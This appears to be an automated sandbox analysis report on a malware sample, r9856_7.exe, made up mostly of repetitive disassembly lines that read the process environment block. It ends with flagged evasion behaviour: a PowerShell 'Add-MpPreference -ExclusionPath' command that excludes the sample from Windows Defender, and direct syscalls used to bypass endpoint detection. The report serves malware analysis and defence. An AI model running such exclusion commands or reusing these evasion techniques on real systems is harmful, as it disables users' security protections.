            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111674D mov esi, dword ptr fs:[00000030h]4_2_0111674D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111674D mov eax, dword ptr fs:[00000030h]4_2_0111674D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111674D mov eax, dword ptr fs:[00000030h]4_2_0111674D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E0750 mov eax, dword ptr fs:[00000030h]4_2_010E0750
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E8770 mov eax, dword ptr fs:[00000030h]4_2_010E8770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0770 mov eax, dword ptr fs:[00000030h]4_2_010F0770
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118678E mov eax, dword ptr fs:[00000030h]4_2_0118678E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E07AF mov eax, dword ptr fs:[00000030h]4_2_010E07AF
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011947A0 mov eax, dword ptr fs:[00000030h]4_2_011947A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EC7C0 mov eax, dword ptr fs:[00000030h]4_2_010EC7C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011607C3 mov eax, dword ptr fs:[00000030h]4_2_011607C3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E47FB mov eax, dword ptr fs:[00000030h]4_2_010E47FB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E47FB mov eax, dword ptr fs:[00000030h]4_2_010E47FB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116E7E1 mov eax, dword ptr fs:[00000030h]4_2_0116E7E1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011027ED mov eax, dword ptr fs:[00000030h]4_2_011027ED
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011027ED mov eax, dword ptr fs:[00000030h]4_2_011027ED
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011027ED mov eax, dword ptr fs:[00000030h]4_2_011027ED
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F260B mov eax, dword ptr fs:[00000030h]4_2_010F260B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F260B mov eax, dword ptr fs:[00000030h]4_2_010F260B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F260B mov eax, dword ptr fs:[00000030h]4_2_010F260B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F260B mov eax, dword ptr fs:[00000030h]4_2_010F260B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F260B mov eax, dword ptr fs:[00000030h]4_2_010F260B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F260B mov eax, dword ptr fs:[00000030h]4_2_010F260B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F260B mov eax, dword ptr fs:[00000030h]4_2_010F260B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01122619 mov eax, dword ptr fs:[00000030h]4_2_01122619
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115E609 mov eax, dword ptr fs:[00000030h]4_2_0115E609
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E262C mov eax, dword ptr fs:[00000030h]4_2_010E262C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FE627 mov eax, dword ptr fs:[00000030h]4_2_010FE627
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01116620 mov eax, dword ptr fs:[00000030h]4_2_01116620
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01118620 mov eax, dword ptr fs:[00000030h]4_2_01118620
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010FC640 mov eax, dword ptr fs:[00000030h]4_2_010FC640
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01112674 mov eax, dword ptr fs:[00000030h]4_2_01112674
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A660 mov eax, dword ptr fs:[00000030h]4_2_0111A660
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A660 mov eax, dword ptr fs:[00000030h]4_2_0111A660
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A866E mov eax, dword ptr fs:[00000030h]4_2_011A866E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A866E mov eax, dword ptr fs:[00000030h]4_2_011A866E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E4690 mov eax, dword ptr fs:[00000030h]4_2_010E4690
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E4690 mov eax, dword ptr fs:[00000030h]4_2_010E4690
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011166B0 mov eax, dword ptr fs:[00000030h]4_2_011166B0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111C6A6 mov eax, dword ptr fs:[00000030h]4_2_0111C6A6
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0111A6C7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A6C7 mov eax, dword ptr fs:[00000030h]4_2_0111A6C7
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115E6F2 mov eax, dword ptr fs:[00000030h]4_2_0115E6F2
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115E6F2 mov eax, dword ptr fs:[00000030h]4_2_0115E6F2
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115E6F2 mov eax, dword ptr fs:[00000030h]4_2_0115E6F2
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115E6F2 mov eax, dword ptr fs:[00000030h]4_2_0115E6F2
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011606F1 mov eax, dword ptr fs:[00000030h]4_2_011606F1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011606F1 mov eax, dword ptr fs:[00000030h]4_2_011606F1
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116C912 mov eax, dword ptr fs:[00000030h]4_2_0116C912
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010D8918 mov eax, dword ptr fs:[00000030h]4_2_010D8918
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010D8918 mov eax, dword ptr fs:[00000030h]4_2_010D8918
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115E908 mov eax, dword ptr fs:[00000030h]4_2_0115E908
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115E908 mov eax, dword ptr fs:[00000030h]4_2_0115E908
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116892A mov eax, dword ptr fs:[00000030h]4_2_0116892A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0117892B mov eax, dword ptr fs:[00000030h]4_2_0117892B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01160946 mov eax, dword ptr fs:[00000030h]4_2_01160946
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4940 mov eax, dword ptr fs:[00000030h]4_2_011B4940
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01184978 mov eax, dword ptr fs:[00000030h]4_2_01184978
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01184978 mov eax, dword ptr fs:[00000030h]4_2_01184978
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116C97C mov eax, dword ptr fs:[00000030h]4_2_0116C97C
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01106962 mov eax, dword ptr fs:[00000030h]4_2_01106962
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01106962 mov eax, dword ptr fs:[00000030h]4_2_01106962
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01106962 mov eax, dword ptr fs:[00000030h]4_2_01106962
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0112096E mov eax, dword ptr fs:[00000030h]4_2_0112096E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0112096E mov edx, dword ptr fs:[00000030h]4_2_0112096E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0112096E mov eax, dword ptr fs:[00000030h]4_2_0112096E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E09AD mov eax, dword ptr fs:[00000030h]4_2_010E09AD
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E09AD mov eax, dword ptr fs:[00000030h]4_2_010E09AD
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011689B3 mov esi, dword ptr fs:[00000030h]4_2_011689B3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011689B3 mov eax, dword ptr fs:[00000030h]4_2_011689B3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011689B3 mov eax, dword ptr fs:[00000030h]4_2_011689B3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F29A0 mov eax, dword ptr fs:[00000030h]4_2_010F29A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F29A0 mov eax, dword ptr fs:[00000030h]4_2_010F29A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F29A0 mov eax, dword ptr fs:[00000030h]4_2_010F29A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F29A0 mov eax, dword ptr fs:[00000030h]4_2_010F29A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F29A0 mov eax, dword ptr fs:[00000030h]4_2_010F29A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F29A0 mov eax, dword ptr fs:[00000030h]4_2_010F29A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F29A0 mov eax, dword ptr fs:[00000030h]4_2_010F29A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F29A0 mov eax, dword ptr fs:[00000030h]4_2_010F29A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F29A0 mov eax, dword ptr fs:[00000030h]4_2_010F29A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F29A0 mov eax, dword ptr fs:[00000030h]4_2_010F29A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F29A0 mov eax, dword ptr fs:[00000030h]4_2_010F29A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F29A0 mov eax, dword ptr fs:[00000030h]4_2_010F29A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F29A0 mov eax, dword ptr fs:[00000030h]4_2_010F29A0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011149D0 mov eax, dword ptr fs:[00000030h]4_2_011149D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AA9D3 mov eax, dword ptr fs:[00000030h]4_2_011AA9D3
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011769C0 mov eax, dword ptr fs:[00000030h]4_2_011769C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA9D0 mov eax, dword ptr fs:[00000030h]4_2_010EA9D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA9D0 mov eax, dword ptr fs:[00000030h]4_2_010EA9D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA9D0 mov eax, dword ptr fs:[00000030h]4_2_010EA9D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA9D0 mov eax, dword ptr fs:[00000030h]4_2_010EA9D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA9D0 mov eax, dword ptr fs:[00000030h]4_2_010EA9D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EA9D0 mov eax, dword ptr fs:[00000030h]4_2_010EA9D0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011129F9 mov eax, dword ptr fs:[00000030h]4_2_011129F9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011129F9 mov eax, dword ptr fs:[00000030h]4_2_011129F9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116E9E0 mov eax, dword ptr fs:[00000030h]4_2_0116E9E0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116C810 mov eax, dword ptr fs:[00000030h]4_2_0116C810
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111A830 mov eax, dword ptr fs:[00000030h]4_2_0111A830
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118483A mov eax, dword ptr fs:[00000030h]4_2_0118483A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118483A mov eax, dword ptr fs:[00000030h]4_2_0118483A
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01102835 mov eax, dword ptr fs:[00000030h]4_2_01102835
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01102835 mov eax, dword ptr fs:[00000030h]4_2_01102835
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01102835 mov eax, dword ptr fs:[00000030h]4_2_01102835
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01102835 mov ecx, dword ptr fs:[00000030h]4_2_01102835
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01102835 mov eax, dword ptr fs:[00000030h]4_2_01102835
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01102835 mov eax, dword ptr fs:[00000030h]4_2_01102835
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01110854 mov eax, dword ptr fs:[00000030h]4_2_01110854
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F2840 mov ecx, dword ptr fs:[00000030h]4_2_010F2840
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E4859 mov eax, dword ptr fs:[00000030h]4_2_010E4859
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E4859 mov eax, dword ptr fs:[00000030h]4_2_010E4859
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116E872 mov eax, dword ptr fs:[00000030h]4_2_0116E872
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116E872 mov eax, dword ptr fs:[00000030h]4_2_0116E872
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01176870 mov eax, dword ptr fs:[00000030h]4_2_01176870
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01176870 mov eax, dword ptr fs:[00000030h]4_2_01176870
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E0887 mov eax, dword ptr fs:[00000030h]4_2_010E0887
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116C89D mov eax, dword ptr fs:[00000030h]4_2_0116C89D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110E8C0 mov eax, dword ptr fs:[00000030h]4_2_0110E8C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B08C0 mov eax, dword ptr fs:[00000030h]4_2_011B08C0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111C8F9 mov eax, dword ptr fs:[00000030h]4_2_0111C8F9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111C8F9 mov eax, dword ptr fs:[00000030h]4_2_0111C8F9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AA8E4 mov eax, dword ptr fs:[00000030h]4_2_011AA8E4
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115EB1D mov eax, dword ptr fs:[00000030h]4_2_0115EB1D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115EB1D mov eax, dword ptr fs:[00000030h]4_2_0115EB1D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115EB1D mov eax, dword ptr fs:[00000030h]4_2_0115EB1D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115EB1D mov eax, dword ptr fs:[00000030h]4_2_0115EB1D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115EB1D mov eax, dword ptr fs:[00000030h]4_2_0115EB1D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115EB1D mov eax, dword ptr fs:[00000030h]4_2_0115EB1D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115EB1D mov eax, dword ptr fs:[00000030h]4_2_0115EB1D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115EB1D mov eax, dword ptr fs:[00000030h]4_2_0115EB1D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115EB1D mov eax, dword ptr fs:[00000030h]4_2_0115EB1D
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4B00 mov eax, dword ptr fs:[00000030h]4_2_011B4B00
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110EB20 mov eax, dword ptr fs:[00000030h]4_2_0110EB20
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110EB20 mov eax, dword ptr fs:[00000030h]4_2_0110EB20
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A8B28 mov eax, dword ptr fs:[00000030h]4_2_011A8B28
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011A8B28 mov eax, dword ptr fs:[00000030h]4_2_011A8B28
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118EB50 mov eax, dword ptr fs:[00000030h]4_2_0118EB50
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B2B57 mov eax, dword ptr fs:[00000030h]4_2_011B2B57
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B2B57 mov eax, dword ptr fs:[00000030h]4_2_011B2B57
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B2B57 mov eax, dword ptr fs:[00000030h]4_2_011B2B57
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B2B57 mov eax, dword ptr fs:[00000030h]4_2_011B2B57
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01194B4B mov eax, dword ptr fs:[00000030h]4_2_01194B4B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01194B4B mov eax, dword ptr fs:[00000030h]4_2_01194B4B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01176B40 mov eax, dword ptr fs:[00000030h]4_2_01176B40
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01176B40 mov eax, dword ptr fs:[00000030h]4_2_01176B40
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011AAB40 mov eax, dword ptr fs:[00000030h]4_2_011AAB40
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01188B42 mov eax, dword ptr fs:[00000030h]4_2_01188B42
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010D8B50 mov eax, dword ptr fs:[00000030h]4_2_010D8B50
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010DCB7E mov eax, dword ptr fs:[00000030h]4_2_010DCB7E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01194BB0 mov eax, dword ptr fs:[00000030h]4_2_01194BB0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01194BB0 mov eax, dword ptr fs:[00000030h]4_2_01194BB0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0BBE mov eax, dword ptr fs:[00000030h]4_2_010F0BBE
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0BBE mov eax, dword ptr fs:[00000030h]4_2_010F0BBE
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E0BCD mov eax, dword ptr fs:[00000030h]4_2_010E0BCD
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E0BCD mov eax, dword ptr fs:[00000030h]4_2_010E0BCD
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E0BCD mov eax, dword ptr fs:[00000030h]4_2_010E0BCD
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118EBD0 mov eax, dword ptr fs:[00000030h]4_2_0118EBD0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01100BCB mov eax, dword ptr fs:[00000030h]4_2_01100BCB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01100BCB mov eax, dword ptr fs:[00000030h]4_2_01100BCB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01100BCB mov eax, dword ptr fs:[00000030h]4_2_01100BCB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116CBF0 mov eax, dword ptr fs:[00000030h]4_2_0116CBF0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110EBFC mov eax, dword ptr fs:[00000030h]4_2_0110EBFC
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E8BF0 mov eax, dword ptr fs:[00000030h]4_2_010E8BF0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E8BF0 mov eax, dword ptr fs:[00000030h]4_2_010E8BF0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E8BF0 mov eax, dword ptr fs:[00000030h]4_2_010E8BF0
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0116CA11 mov eax, dword ptr fs:[00000030h]4_2_0116CA11
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01104A35 mov eax, dword ptr fs:[00000030h]4_2_01104A35
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01104A35 mov eax, dword ptr fs:[00000030h]4_2_01104A35
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111CA38 mov eax, dword ptr fs:[00000030h]4_2_0111CA38
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111CA24 mov eax, dword ptr fs:[00000030h]4_2_0111CA24
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0110EA2E mov eax, dword ptr fs:[00000030h]4_2_0110EA2E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0A5B mov eax, dword ptr fs:[00000030h]4_2_010F0A5B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010F0A5B mov eax, dword ptr fs:[00000030h]4_2_010F0A5B
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E6A50 mov eax, dword ptr fs:[00000030h]4_2_010E6A50
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E6A50 mov eax, dword ptr fs:[00000030h]4_2_010E6A50
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E6A50 mov eax, dword ptr fs:[00000030h]4_2_010E6A50
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E6A50 mov eax, dword ptr fs:[00000030h]4_2_010E6A50
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E6A50 mov eax, dword ptr fs:[00000030h]4_2_010E6A50
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E6A50 mov eax, dword ptr fs:[00000030h]4_2_010E6A50
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E6A50 mov eax, dword ptr fs:[00000030h]4_2_010E6A50
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115CA72 mov eax, dword ptr fs:[00000030h]4_2_0115CA72
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0115CA72 mov eax, dword ptr fs:[00000030h]4_2_0115CA72
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0118EA60 mov eax, dword ptr fs:[00000030h]4_2_0118EA60
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111CA6F mov eax, dword ptr fs:[00000030h]4_2_0111CA6F
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111CA6F mov eax, dword ptr fs:[00000030h]4_2_0111CA6F
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0111CA6F mov eax, dword ptr fs:[00000030h]4_2_0111CA6F
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_01118A90 mov edx, dword ptr fs:[00000030h]4_2_01118A90
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EEA80 mov eax, dword ptr fs:[00000030h]4_2_010EEA80
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EEA80 mov eax, dword ptr fs:[00000030h]4_2_010EEA80
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EEA80 mov eax, dword ptr fs:[00000030h]4_2_010EEA80
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EEA80 mov eax, dword ptr fs:[00000030h]4_2_010EEA80
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EEA80 mov eax, dword ptr fs:[00000030h]4_2_010EEA80
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EEA80 mov eax, dword ptr fs:[00000030h]4_2_010EEA80
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EEA80 mov eax, dword ptr fs:[00000030h]4_2_010EEA80
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EEA80 mov eax, dword ptr fs:[00000030h]4_2_010EEA80
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010EEA80 mov eax, dword ptr fs:[00000030h]4_2_010EEA80
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_011B4A80 mov eax, dword ptr fs:[00000030h]4_2_011B4A80
            Source: C:\Users\user\Desktop\r9856_7.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\r9856_7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe"
            Source: C:\Users\user\Desktop\r9856_7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
